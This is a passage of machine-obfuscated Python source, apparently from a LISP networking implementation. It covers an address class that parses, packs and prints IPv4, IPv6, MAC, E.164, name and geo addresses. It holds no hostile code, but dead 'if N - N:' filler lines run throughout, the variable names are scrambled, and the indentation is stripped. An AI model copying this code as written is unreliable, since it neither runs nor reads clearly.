if 81 - 81: ooOoO0o . Oo0Ooo . OoOoOO00 + OOooOOo % iII111i - oO0o
if 68 - 68: iII111i - O0 / Ii1I
if 15 - 15: I1Ii111 / I1ii11iIi11i / I1IiiI % i11iIiiIii + II111iiii . ooOoO0o
if 74 - 74: o0oOOo0O0Ooo
if 4 - 4: I1ii11iIi11i * II111iiii - Oo0Ooo % i1IIi % O0 * i11iIiiIii
if 62 - 62: OoO0O00 * I1Ii111 * Ii1I / ooOoO0o
if 27 - 27: oO0o . iII111i . oO0o
if 37 - 37: Oo0Ooo . I1ii11iIi11i / OoooooooOO % ooOoO0o / I1IiiI + ooOoO0o
if 14 - 14: I11i + ooOoO0o . oO0o * I11i
if 98 - 98: Ii1I . i1IIi * OoO0O00 * Ii1I * iIii1I11I1II1
if 22 - 22: OoooooooOO - OoO0O00 + OoOoOO00 - OOooOOo + i11iIiiIii - oO0o
if 9 - 9: I1Ii111 - i1IIi . ooOoO0o
if 33 - 33: I11i
if 37 - 37: Oo0Ooo
if 36 - 36: IiII % I11i
if 72 - 72: oO0o % I11i % OOooOOo * iIii1I11I1II1 - OOooOOo % O0
OoiIii11i11i = i1iI11i . lookup_source_cache ( eid , exact )
if ( OoiIii11i11i ) : return ( OoiIii11i11i )
if 84 - 84: oO0o - o0oOOo0O0Ooo / II111iiii . o0oOOo0O0Ooo
if ( exact ) :
i1iI11i = None
else :
O0oOoO00O = i1iI11i . parent_for_more_specifics
if ( O0oOoO00O and O0oOoO00O . accept_more_specifics ) :
if ( group . is_more_specific ( O0oOoO00O . group ) ) : i1iI11i = O0oOoO00O
if 82 - 82: OoooooooOO
if 14 - 14: OoO0O00 / oO0o - OOooOOo
return ( i1iI11i )
if 100 - 100: IiII - I11i . iIii1I11I1II1 / iIii1I11I1II1
if 16 - 16: IiII + Oo0Ooo % I11i
if 16 - 16: ooOoO0o / I1Ii111
if 78 - 78: OoOoOO00 - II111iiii - OOooOOo + I1IiiI + O0 / I1IiiI
if 59 - 59: OOooOOo . I1IiiI / i1IIi / II111iiii . II111iiii
if 54 - 54: iIii1I11I1II1 % ooOoO0o
if 37 - 37: OOooOOo % OoOoOO00 - II111iiii * o0oOOo0O0Ooo . I1IiiI . OoOoOO00
if 92 - 92: I11i + OoO0O00 . OoooooooOO
if 3 - 3: OoO0O00 % iIii1I11I1II1
if 62 - 62: OoooooooOO * o0oOOo0O0Ooo
if 59 - 59: iIii1I11I1II1
if 18 - 18: ooOoO0o % I1IiiI / iIii1I11I1II1 + O0
if 99 - 99: i11iIiiIii - o0oOOo0O0Ooo + o0oOOo0O0Ooo . OoooooooOO * iII111i . Oo0Ooo
if 63 - 63: I11i
if 60 - 60: I1IiiI / I1ii11iIi11i / I11i / Ii1I + iIii1I11I1II1
if 85 - 85: O0 / OOooOOo . OoOoOO00 / I1ii11iIi11i
if 80 - 80: I1ii11iIi11i * iII111i % i1IIi * OOooOOo % II111iiii % i1IIi
if 44 - 44: OoooooooOO
if 18 - 18: i11iIiiIii
if 65 - 65: i1IIi . iIii1I11I1II1 % iIii1I11I1II1
if 35 - 35: iIii1I11I1II1 - o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - OOooOOo . o0oOOo0O0Ooo
if 12 - 12: iIii1I11I1II1 % OoO0O00 * Oo0Ooo
if 5 - 5: I11i - II111iiii * iIii1I11I1II1 / iIii1I11I1II1 % IiII * i1IIi
if 30 - 30: i1IIi % I1IiiI . OOooOOo % iIii1I11I1II1 . I1ii11iIi11i / o0oOOo0O0Ooo
if 53 - 53: OOooOOo % ooOoO0o
if 94 - 94: OOooOOo - O0 - I1Ii111 / OoooooooOO - iII111i
class lisp_address ( object ) :
def __init__ ( self , afi , addr_str , mask_len , iid ) :
self . afi = afi
self . mask_len = mask_len
self . instance_id = iid
self . iid_list = [ ]
self . address = 0
if ( addr_str != "" ) : self . store_address ( addr_str )
if 83 - 83: OOooOOo * I1ii11iIi11i * iII111i * I1ii11iIi11i . OoO0O00
if 87 - 87: ooOoO0o . O0 - oO0o
def copy_address ( self , addr ) :
if ( addr == None ) : return
self . afi = addr . afi
self . address = addr . address
self . mask_len = addr . mask_len
self . instance_id = addr . instance_id
self . iid_list = addr . iid_list
if 75 - 75: Oo0Ooo
if 22 - 22: oO0o * I1Ii111 . II111iiii / Ii1I * O0
def make_default_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
self . mask_len = 0
self . address = 0
if 33 - 33: oO0o * i1IIi + ooOoO0o * OOooOOo - O0 - iIii1I11I1II1
if 35 - 35: I1Ii111
def make_default_multicast_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
if ( self . afi == LISP_AFI_IPV4 ) :
self . address = 0xe0000000
self . mask_len = 4
if 12 - 12: Ii1I % I1IiiI - I11i / iIii1I11I1II1 . I1IiiI % I1ii11iIi11i
if ( self . afi == LISP_AFI_IPV6 ) :
self . address = 0xff << 120
self . mask_len = 8
if 12 - 12: Oo0Ooo + I1IiiI
if ( self . afi == LISP_AFI_MAC ) :
self . address = 0xffffffffffff
self . mask_len = 48
if 12 - 12: OoOoOO00 / II111iiii
if 100 - 100: I1ii11iIi11i % iIii1I11I1II1 . IiII . OoooooooOO / II111iiii
if 28 - 28: I1IiiI
def not_set ( self ) :
return ( self . afi == LISP_AFI_NONE )
if 27 - 27: I1IiiI % oO0o - iIii1I11I1II1 - o0oOOo0O0Ooo - IiII - O0
if 46 - 46: II111iiii
def is_private_address ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
IiI = self . address
if ( ( ( IiI & 0xff000000 ) >> 24 ) == 10 ) : return ( True )
if ( ( ( IiI & 0xff000000 ) >> 24 ) == 172 ) :
IiIiI1IIi1Ii = ( IiI & 0x00ff0000 ) >> 16
if ( IiIiI1IIi1Ii >= 16 and IiIiI1IIi1Ii <= 31 ) : return ( True )
if 5 - 5: i11iIiiIii . OoO0O00 - oO0o - OoooooooOO % IiII * O0
if ( ( ( IiI & 0xffff0000 ) >> 16 ) == 0xc0a8 ) : return ( True )
return ( False )
if 48 - 48: Ii1I / Ii1I / i1IIi * I1IiiI . iII111i + I1ii11iIi11i
if 66 - 66: iIii1I11I1II1 . iIii1I11I1II1 + I1ii11iIi11i
def is_multicast_address ( self ) :
if ( self . is_ipv4 ( ) ) : return ( self . is_ipv4_multicast ( ) )
if ( self . is_ipv6 ( ) ) : return ( self . is_ipv6_multicast ( ) )
if ( self . is_mac ( ) ) : return ( self . is_mac_multicast ( ) )
return ( False )
if 45 - 45: iII111i . oO0o * iII111i
if 3 - 3: OoOoOO00 / Oo0Ooo - Oo0Ooo
def host_mask_len ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( LISP_IPV4_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_IPV6 ) : return ( LISP_IPV6_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_MAC ) : return ( LISP_MAC_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_E164 ) : return ( LISP_E164_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) * 8 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) * 8 )
if 54 - 54: Oo0Ooo . OoO0O00 * I1IiiI % IiII
return ( 0 )
if 97 - 97: o0oOOo0O0Ooo + Ii1I
if 77 - 77: I11i - oO0o . Ii1I
def is_iana_eid ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
IiI = self . address >> 96
return ( IiI == 0x20010005 )
if 75 - 75: I11i * OoooooooOO % OoOoOO00 . i1IIi - Ii1I + iIii1I11I1II1
if 74 - 74: ooOoO0o
def addr_length ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 16 )
if ( self . afi == LISP_AFI_MAC ) : return ( 6 )
if ( self . afi == LISP_AFI_E164 ) : return ( 8 )
if ( self . afi == LISP_AFI_LCAF ) : return ( 0 )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) + 1 )
if ( self . afi == LISP_AFI_IID_RANGE ) : return ( 4 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) )
if 18 - 18: iIii1I11I1II1 - I11i - oO0o
return ( 0 )
if 12 - 12: O0 + O0 + ooOoO0o . I1IiiI * II111iiii
if 47 - 47: i11iIiiIii % OOooOOo / ooOoO0o . IiII - I1IiiI
def afi_to_version ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 6 )
return ( 0 )
if 10 - 10: Oo0Ooo / ooOoO0o / I1ii11iIi11i
if 98 - 98: O0 - I1Ii111 - i11iIiiIii
def packet_format ( self ) :
if 85 - 85: II111iiii - I1ii11iIi11i % I1IiiI . I1IiiI - OoooooooOO - I11i
if 38 - 38: i1IIi + oO0o * ooOoO0o % Ii1I % ooOoO0o
if 80 - 80: OoO0O00 + OoOoOO00 % iII111i % OoooooooOO - ooOoO0o
if 25 - 25: OoOoOO00 % i11iIiiIii - I1IiiI * iIii1I11I1II1 - Oo0Ooo . O0
if 48 - 48: I1IiiI + oO0o % i11iIiiIii % iIii1I11I1II1
if ( self . afi == LISP_AFI_IPV4 ) : return ( "I" )
if ( self . afi == LISP_AFI_IPV6 ) : return ( "QQ" )
if ( self . afi == LISP_AFI_MAC ) : return ( "HHH" )
if ( self . afi == LISP_AFI_E164 ) : return ( "II" )
if ( self . afi == LISP_AFI_LCAF ) : return ( "I" )
return ( "" )
if 14 - 14: iIii1I11I1II1
if 78 - 78: I1Ii111 / Oo0Ooo - I1Ii111
def pack_address ( self ) :
iiII1iiI = self . packet_format ( )
Oo00oo = b""
if ( self . is_ipv4 ( ) ) :
Oo00oo = struct . pack ( iiII1iiI , socket . htonl ( self . address ) )
elif ( self . is_ipv6 ( ) ) :
IiIiI = byte_swap_64 ( self . address >> 64 )
iI1Ii11 = byte_swap_64 ( self . address & 0xffffffffffffffff )
Oo00oo = struct . pack ( iiII1iiI , IiIiI , iI1Ii11 )
elif ( self . is_mac ( ) ) :
IiI = self . address
IiIiI = ( IiI >> 32 ) & 0xffff
iI1Ii11 = ( IiI >> 16 ) & 0xffff
iI1II1i1I = IiI & 0xffff
Oo00oo = struct . pack ( iiII1iiI , IiIiI , iI1Ii11 , iI1II1i1I )
elif ( self . is_e164 ( ) ) :
IiI = self . address
IiIiI = ( IiI >> 32 ) & 0xffffffff
iI1Ii11 = ( IiI & 0xffffffff )
Oo00oo = struct . pack ( iiII1iiI , IiIiI , iI1Ii11 )
elif ( self . is_dist_name ( ) ) :
Oo00oo += ( self . address + "\0" ) . encode ( )
if 19 - 19: iIii1I11I1II1 / iII111i + OOooOOo . ooOoO0o
return ( Oo00oo )
if 85 - 85: i1IIi
if 78 - 78: oO0o
def unpack_address ( self , packet ) :
iiII1iiI = self . packet_format ( )
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 6 - 6: IiII
IiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 69 - 69: iII111i
if ( self . is_ipv4 ( ) ) :
self . address = socket . ntohl ( IiI [ 0 ] )
if 87 - 87: i11iIiiIii % o0oOOo0O0Ooo + Ii1I
elif ( self . is_ipv6 ( ) ) :
if 72 - 72: Ii1I / II111iiii + o0oOOo0O0Ooo
if 33 - 33: I1Ii111 * OoOoOO00 - OoooooooOO
if 11 - 11: I1Ii111 - Oo0Ooo / iIii1I11I1II1 - OoooooooOO
if 71 - 71: Oo0Ooo + Ii1I - OoooooooOO + I11i - iIii1I11I1II1 / O0
if 76 - 76: i11iIiiIii % o0oOOo0O0Ooo . O0 * I11i
if 90 - 90: II111iiii + OOooOOo % I1Ii111 * iIii1I11I1II1 % iIii1I11I1II1
if 55 - 55: II111iiii % O0 * O0 - II111iiii * I1IiiI % Oo0Ooo
if 48 - 48: I1ii11iIi11i + OoooooooOO % i1IIi
if ( IiI [ 0 ] <= 0xffff and ( IiI [ 0 ] & 0xff ) == 0 ) :
i1iiI11 = ( IiI [ 0 ] << 48 ) << 64
else :
i1iiI11 = byte_swap_64 ( IiI [ 0 ] ) << 64
if 13 - 13: Oo0Ooo + iII111i * OoooooooOO % i11iIiiIii * II111iiii . OoooooooOO
I1iO00O = byte_swap_64 ( IiI [ 1 ] )
self . address = i1iiI11 | I1iO00O
if 9 - 9: oO0o - O0 . iIii1I11I1II1 . ooOoO0o
elif ( self . is_mac ( ) ) :
I1Oo0O = IiI [ 0 ]
i1i1I111iiIi1 = IiI [ 1 ]
ooo00OOOoOO = IiI [ 2 ]
self . address = ( I1Oo0O << 32 ) + ( i1i1I111iiIi1 << 16 ) + ooo00OOOoOO
if 22 - 22: OoOoOO00 / o0oOOo0O0Ooo % I1Ii111 % i11iIiiIii % I1IiiI
elif ( self . is_e164 ( ) ) :
self . address = ( IiI [ 0 ] << 32 ) + IiI [ 1 ]
if 22 - 22: o0oOOo0O0Ooo - I1Ii111
elif ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
ooo0000oo0 = 0
if 50 - 50: I11i - OoOoOO00 + I1IiiI % Oo0Ooo / OoooooooOO - I1ii11iIi11i
packet = packet [ ooo0000oo0 : : ]
return ( packet )
if 26 - 26: IiII . Ii1I
if 35 - 35: I1ii11iIi11i + OOooOOo
def is_ipv4 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV4 ) else False )
if 88 - 88: O0
if 4 - 4: OoOoOO00 % iIii1I11I1II1 % OoooooooOO . oO0o
def is_ipv4_link_local ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 16 ) & 0xffff ) == 0xa9fe )
if 27 - 27: II111iiii - OoOoOO00
if 81 - 81: o0oOOo0O0Ooo - Oo0Ooo % IiII - ooOoO0o / O0
def is_ipv4_loopback ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( self . address == 0x7f000001 )
if 27 - 27: Oo0Ooo
if 15 - 15: iIii1I11I1II1 . OoOoOO00 % Ii1I / i1IIi . o0oOOo0O0Ooo
def is_ipv4_multicast ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 24 ) & 0xf0 ) == 0xe0 )
if 45 - 45: iIii1I11I1II1 - i1IIi % I1IiiI - I1Ii111 + oO0o
if 15 - 15: iIii1I11I1II1 - OoooooooOO / ooOoO0o
def is_ipv4_string ( self , addr_str ) :
return ( addr_str . find ( "." ) != - 1 )
if 83 - 83: IiII + I1Ii111 / OoOoOO00 * IiII . oO0o
if 22 - 22: O0 + ooOoO0o + I1Ii111
def is_ipv6 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV6 ) else False )
if 57 - 57: OOooOOo . ooOoO0o - OoooooooOO - I1ii11iIi11i * O0
if 85 - 85: I1IiiI * OoO0O00
def is_ipv6_link_local ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 112 ) & 0xffff ) == 0xfe80 )
if 63 - 63: I1IiiI - i11iIiiIii
if 4 - 4: OOooOOo + iIii1I11I1II1 / I1IiiI * Ii1I
def is_ipv6_string_link_local ( self , addr_str ) :
return ( addr_str . find ( "fe80::" ) != - 1 )
if 64 - 64: OoOoOO00
if 94 - 94: OOooOOo * OoooooooOO * o0oOOo0O0Ooo / I1Ii111 . II111iiii
def is_ipv6_loopback ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( self . address == 1 )
if 37 - 37: O0 * II111iiii * I1IiiI - O0 - I11i / i1IIi
if 27 - 27: i11iIiiIii + iIii1I11I1II1
def is_ipv6_multicast ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 120 ) & 0xff ) == 0xff )
if 15 - 15: oO0o
if 69 - 69: II111iiii * O0 . ooOoO0o * IiII
def is_ipv6_string ( self , addr_str ) :
return ( addr_str . find ( ":" ) != - 1 )
if 25 - 25: I11i - I1ii11iIi11i . I1Ii111 . OoooooooOO
if 4 - 4: IiII * OoO0O00 % I1ii11iIi11i * Ii1I . iII111i
def is_mac ( self ) :
return ( True if ( self . afi == LISP_AFI_MAC ) else False )
if 41 - 41: OoooooooOO % I11i . O0 + I1Ii111
if 67 - 67: OoOoOO00 * OOooOOo / OOooOOo / OoooooooOO
def is_mac_multicast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( ( self . address & 0x010000000000 ) != 0 )
if 67 - 67: I11i - i1IIi . OoooooooOO / iIii1I11I1II1
if 34 - 34: OoO0O00 * II111iiii
def is_mac_broadcast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( self . address == 0xffffffffffff )
if 43 - 43: OoOoOO00 . I1IiiI
if 44 - 44: O0 / o0oOOo0O0Ooo
def is_mac_string ( self , addr_str ) :
return ( len ( addr_str ) == 15 and addr_str . find ( "-" ) != - 1 )
if 19 - 19: I11i
if 91 - 91: OOooOOo * OoooooooOO
def is_link_local_multicast ( self ) :
if ( self . is_ipv4 ( ) ) :
return ( ( 0xe0ffff00 & self . address ) == 0xe0000000 )
if 89 - 89: i1IIi / iII111i . I1Ii111
if ( self . is_ipv6 ( ) ) :
return ( ( self . address >> 112 ) & 0xffff == 0xff02 )
if 74 - 74: I1ii11iIi11i % iII111i / OoooooooOO / I1ii11iIi11i % i11iIiiIii % ooOoO0o
return ( False )
if 82 - 82: OoooooooOO . o0oOOo0O0Ooo * I1ii11iIi11i % I1ii11iIi11i * Ii1I
if 83 - 83: I11i - Oo0Ooo + i11iIiiIii - i11iIiiIii
def is_null ( self ) :
return ( True if ( self . afi == LISP_AFI_NONE ) else False )
if 64 - 64: IiII % I1IiiI / ooOoO0o
if 74 - 74: OoooooooOO
def is_ultimate_root ( self ) :
return ( True if self . afi == LISP_AFI_ULTIMATE_ROOT else False )
if 22 - 22: II111iiii . O0 * I1Ii111 % OoO0O00 / OoooooooOO + I1Ii111
if 71 - 71: ooOoO0o . oO0o * OoooooooOO + iII111i - I1Ii111 . I1ii11iIi11i
def is_iid_range ( self ) :
return ( True if self . afi == LISP_AFI_IID_RANGE else False )
if 100 - 100: I11i + O0 - o0oOOo0O0Ooo * I1ii11iIi11i
if 94 - 94: Oo0Ooo . IiII / Ii1I / oO0o - I1IiiI
def is_e164 ( self ) :
return ( True if ( self . afi == LISP_AFI_E164 ) else False )
if 77 - 77: i11iIiiIii . Ii1I - Ii1I
if 47 - 47: iII111i % OOooOOo . I1ii11iIi11i + I1ii11iIi11i . I1Ii111
def is_dist_name ( self ) :
return ( True if ( self . afi == LISP_AFI_NAME ) else False )
if 20 - 20: oO0o - o0oOOo0O0Ooo + I1IiiI % OoOoOO00
if 41 - 41: oO0o . ooOoO0o
def is_geo_prefix ( self ) :
return ( True if ( self . afi == LISP_AFI_GEO_COORD ) else False )
if 59 - 59: iIii1I11I1II1 - I1IiiI . ooOoO0o
if 58 - 58: I1IiiI * I1Ii111 + iII111i + iIii1I11I1II1 + I1IiiI
def is_binary ( self ) :
if ( self . is_dist_name ( ) ) : return ( False )
if ( self . is_geo_prefix ( ) ) : return ( False )
return ( True )
if 78 - 78: Oo0Ooo + ooOoO0o
if 56 - 56: OoO0O00 / i1IIi + ooOoO0o . ooOoO0o . iII111i
def store_address ( self , addr_str ) :
if ( self . afi == LISP_AFI_NONE ) : self . string_to_afi ( addr_str )
if 37 - 37: iIii1I11I1II1 * OoOoOO00 . OoOoOO00 + OoooooooOO + OoO0O00
if 25 - 25: I1IiiI / IiII . OOooOOo . I1ii11iIi11i % i1IIi
if 12 - 12: O0 % O0
if 9 - 9: O0 . I1IiiI + I1ii11iIi11i / OOooOOo * I1ii11iIi11i
iIi1iIIIiIiI = addr_str . find ( "[" )
I1I1II1iI = addr_str . find ( "]" )
if ( iIi1iIIIiIiI != - 1 and I1I1II1iI != - 1 ) :
self . instance_id = int ( addr_str [ iIi1iIIIiIiI + 1 : I1I1II1iI ] )
addr_str = addr_str [ I1I1II1iI + 1 : : ]
if ( self . is_dist_name ( ) == False ) :
addr_str = addr_str . replace ( " " , "" )
if 10 - 10: IiII % o0oOOo0O0Ooo / O0 / II111iiii
if 81 - 81: Ii1I / o0oOOo0O0Ooo % OoOoOO00 . I1ii11iIi11i
if 47 - 47: II111iiii + OOooOOo / II111iiii . OOooOOo
if 68 - 68: OoooooooOO
if 63 - 63: I1IiiI
if 80 - 80: oO0o + iIii1I11I1II1
if ( self . is_ipv4 ( ) ) :
oOo0000OOo = addr_str . split ( "." )
oOO0 = int ( oOo0000OOo [ 0 ] ) << 24
oOO0 += int ( oOo0000OOo [ 1 ] ) << 16
oOO0 += int ( oOo0000OOo [ 2 ] ) << 8
oOO0 += int ( oOo0000OOo [ 3 ] )
self . address = oOO0
elif ( self . is_ipv6 ( ) ) :
if 88 - 88: iII111i / I11i / I1ii11iIi11i + IiII * OoooooooOO . IiII
if 3 - 3: ooOoO0o - Oo0Ooo
if 86 - 86: I1ii11iIi11i * I1Ii111 / o0oOOo0O0Ooo . OoO0O00
if 14 - 14: I11i * IiII / iIii1I11I1II1
if 88 - 88: OoOoOO00 % II111iiii . I1IiiI / oO0o * IiII / i11iIiiIii
if 76 - 76: o0oOOo0O0Ooo
if 80 - 80: OOooOOo
if 15 - 15: OOooOOo . OoOoOO00 / oO0o . I1ii11iIi11i % OoO0O00 - oO0o
if 21 - 21: ooOoO0o . o0oOOo0O0Ooo . oO0o . i1IIi
if 96 - 96: Ii1I % I11i * OoooooooOO . I1IiiI . iIii1I11I1II1
if 8 - 8: O0 + o0oOOo0O0Ooo / O0 - I1ii11iIi11i % I1ii11iIi11i
if 55 - 55: OoooooooOO * OoooooooOO % I1Ii111 / Ii1I / ooOoO0o
if 12 - 12: i11iIiiIii + Ii1I % iIii1I11I1II1 + I1Ii111
if 12 - 12: Ii1I + I1Ii111 / O0 * II111iiii
if 67 - 67: iIii1I11I1II1 / I11i + ooOoO0o * I1Ii111 * oO0o
if 100 - 100: OoooooooOO % I1IiiI / OoOoOO00 % OoOoOO00 . o0oOOo0O0Ooo
if 81 - 81: Ii1I - II111iiii + I11i / Ii1I
OoOOo0 = ( addr_str [ 2 : 4 ] == "::" )
try :
addr_str = socket . inet_pton ( socket . AF_INET6 , addr_str )
except :
addr_str = socket . inet_pton ( socket . AF_INET6 , "0::0" )
if 49 - 49: Oo0Ooo % ooOoO0o % o0oOOo0O0Ooo + ooOoO0o * I1Ii111 % I1IiiI
addr_str = binascii . hexlify ( addr_str )
if 85 - 85: i1IIi / i1IIi
if ( OoOOo0 ) :
addr_str = addr_str [ 2 : 4 ] + addr_str [ 0 : 2 ] + addr_str [ 4 : : ]
if 77 - 77: i1IIi . ooOoO0o % ooOoO0o - Ii1I
self . address = int ( addr_str , 16 )
if 6 - 6: OOooOOo % Ii1I + ooOoO0o
elif ( self . is_geo_prefix ( ) ) :
Ooo0O00o00 = lisp_geo ( None )
Ooo0O00o00 . name = "geo-prefix-{}" . format ( Ooo0O00o00 )
Ooo0O00o00 . parse_geo_string ( addr_str )
self . address = Ooo0O00o00
elif ( self . is_mac ( ) ) :
addr_str = addr_str . replace ( "-" , "" )
oOO0 = int ( addr_str , 16 )
self . address = oOO0
elif ( self . is_e164 ( ) ) :
addr_str = addr_str [ 1 : : ]
oOO0 = int ( addr_str , 16 )
self . address = oOO0 << 4
elif ( self . is_dist_name ( ) ) :
self . address = addr_str . replace ( "'" , "" )
if 17 - 17: iIii1I11I1II1 * I1Ii111 % oO0o + o0oOOo0O0Ooo . Ii1I * Oo0Ooo
self . mask_len = self . host_mask_len ( )
if 16 - 16: I1IiiI % OoO0O00 . ooOoO0o / OoooooooOO
if 8 - 8: I1Ii111 % OoO0O00 . I1IiiI - OoOoOO00 + i1IIi / iIii1I11I1II1
def store_prefix ( self , prefix_str ) :
if ( self . is_geo_string ( prefix_str ) ) :
OOOooo0OooOoO = prefix_str . find ( "]" )
OOOoOo0o0Ooo = len ( prefix_str [ OOOooo0OooOoO + 1 : : ] ) * 8
elif ( prefix_str . find ( "/" ) != - 1 ) :
prefix_str , OOOoOo0o0Ooo = prefix_str . split ( "/" )
else :
iIi1I1 = prefix_str . find ( "'" )
if ( iIi1I1 == - 1 ) : return
II = prefix_str . find ( "'" , iIi1I1 + 1 )
if ( II == - 1 ) : return
OOOoOo0o0Ooo = len ( prefix_str [ iIi1I1 + 1 : II ] ) * 8
if 89 - 89: II111iiii / Ii1I % Ii1I
if 57 - 57: I11i
self . string_to_afi ( prefix_str )
self . store_address ( prefix_str )
self . mask_len = int ( OOOoOo0o0Ooo )
if 95 - 95: OoOoOO00 + I11i * i1IIi - ooOoO0o % ooOoO0o
if 58 - 58: OOooOOo
def zero_host_bits ( self ) :
if ( self . mask_len < 0 ) : return
OoI1111i1 = ( 2 ** self . mask_len ) - 1
oo00oOo0o0o = self . addr_length ( ) * 8 - self . mask_len
OoI1111i1 <<= oo00oOo0o0o
self . address &= OoI1111i1
if 94 - 94: i11iIiiIii % I1ii11iIi11i % IiII - I1Ii111
if 55 - 55: I11i - ooOoO0o - iIii1I11I1II1 + I1ii11iIi11i / IiII
def is_geo_string ( self , addr_str ) :
OOOooo0OooOoO = addr_str . find ( "]" )
if ( OOOooo0OooOoO != - 1 ) : addr_str = addr_str [ OOOooo0OooOoO + 1 : : ]
if 49 - 49: I1ii11iIi11i
Ooo0O00o00 = addr_str . split ( "/" )
if ( len ( Ooo0O00o00 ) == 2 ) :
if ( Ooo0O00o00 [ 1 ] . isdigit ( ) == False ) : return ( False )
if 91 - 91: OOooOOo % iII111i
Ooo0O00o00 = Ooo0O00o00 [ 0 ]
Ooo0O00o00 = Ooo0O00o00 . split ( "-" )
Iii = len ( Ooo0O00o00 )
if ( Iii < 8 or Iii > 9 ) : return ( False )
if 28 - 28: OoO0O00 + i11iIiiIii / i1IIi
for iIiI in range ( 0 , Iii ) :
if ( iIiI == 3 ) :
if ( Ooo0O00o00 [ iIiI ] in [ "N" , "S" ] ) : continue
return ( False )
if 70 - 70: iII111i % II111iiii % O0 / O0 - II111iiii . OoooooooOO
if ( iIiI == 7 ) :
if ( Ooo0O00o00 [ iIiI ] in [ "W" , "E" ] ) : continue
return ( False )
if 78 - 78: OoOoOO00 + i11iIiiIii
if ( Ooo0O00o00 [ iIiI ] . isdigit ( ) == False ) : return ( False )
if 11 - 11: OoOoOO00 . I1IiiI + i11iIiiIii * OoooooooOO
return ( True )
if 74 - 74: OoooooooOO * iII111i % OOooOOo . OoooooooOO * I11i % I1Ii111
if 67 - 67: I11i * i1IIi
def string_to_afi ( self , addr_str ) :
if ( addr_str . count ( "'" ) == 2 ) :
self . afi = LISP_AFI_NAME
return
if 7 - 7: i1IIi * OoOoOO00 . Ii1I
if ( addr_str . find ( ":" ) != - 1 ) : self . afi = LISP_AFI_IPV6
elif ( addr_str . find ( "." ) != - 1 ) : self . afi = LISP_AFI_IPV4
elif ( addr_str . find ( "+" ) != - 1 ) : self . afi = LISP_AFI_E164
elif ( self . is_geo_string ( addr_str ) ) : self . afi = LISP_AFI_GEO_COORD
elif ( addr_str . find ( "-" ) != - 1 ) : self . afi = LISP_AFI_MAC
else : self . afi = LISP_AFI_NONE
if 80 - 80: OoOoOO00 + o0oOOo0O0Ooo - II111iiii
if 3 - 3: ooOoO0o * I1Ii111
def print_address ( self ) :
IiI = self . print_address_no_iid ( )
oooo = "[" + str ( self . instance_id )
for iIi1iIIIiIiI in self . iid_list : oooo += "," + str ( iIi1iIIIiIiI )
oooo += "]"
IiI = "{}{}" . format ( oooo , IiI )
return ( IiI )
if 34 - 34: Ii1I / Oo0Ooo . II111iiii - ooOoO0o - I1ii11iIi11i % OoOoOO00
if 43 - 43: Ii1I * oO0o
def print_address_no_iid ( self ) :
if ( self . is_ipv4 ( ) ) :
IiI = self . address
Oo0o0O0 = IiI >> 24
Oooo00O = ( IiI >> 16 ) & 0xff
OOoO = ( IiI >> 8 ) & 0xff
oooOOo0o0ooO = IiI & 0xff
return ( "{}.{}.{}.{}" . format ( Oo0o0O0 , Oooo00O , OOoO , oooOOo0o0ooO ) )
elif ( self . is_ipv6 ( ) ) :
O0O0 = lisp_hex_string ( self . address ) . zfill ( 32 )
O0O0 = binascii . unhexlify ( O0O0 )
O0O0 = socket . inet_ntop ( socket . AF_INET6 , O0O0 )
return ( "{}" . format ( O0O0 ) )
elif ( self . is_geo_prefix ( ) ) :
return ( "{}" . format ( self . address . print_geo ( ) ) )
elif ( self . is_mac ( ) ) :
O0O0 = lisp_hex_string ( self . address ) . zfill ( 12 )
O0O0 = "{}-{}-{}" . format ( O0O0 [ 0 : 4 ] , O0O0 [ 4 : 8 ] ,
O0O0 [ 8 : 12 ] )
return ( "{}" . format ( O0O0 ) )
elif ( self . is_e164 ( ) ) :
O0O0 = lisp_hex_string ( self . address ) . zfill ( 15 )
return ( "+{}" . format ( O0O0 ) )
elif ( self . is_dist_name ( ) ) :
return ( "'{}'" . format ( self . address ) )
elif ( self . is_null ( ) ) :
return ( "no-address" )
if 66 - 66: Ii1I * I1Ii111 * OoO0O00
return ( "unknown-afi:{}" . format ( self . afi ) )
if 92 - 92: II111iiii * iII111i % OoOoOO00 % OoOoOO00 % i11iIiiIii
if 93 - 93: Ii1I + iIii1I11I1II1 % Ii1I . iIii1I11I1II1
def print_prefix ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "[*]" )
if ( self . is_iid_range ( ) ) :
if ( self . mask_len == 32 ) : return ( "[{}]" . format ( self . instance_id ) )
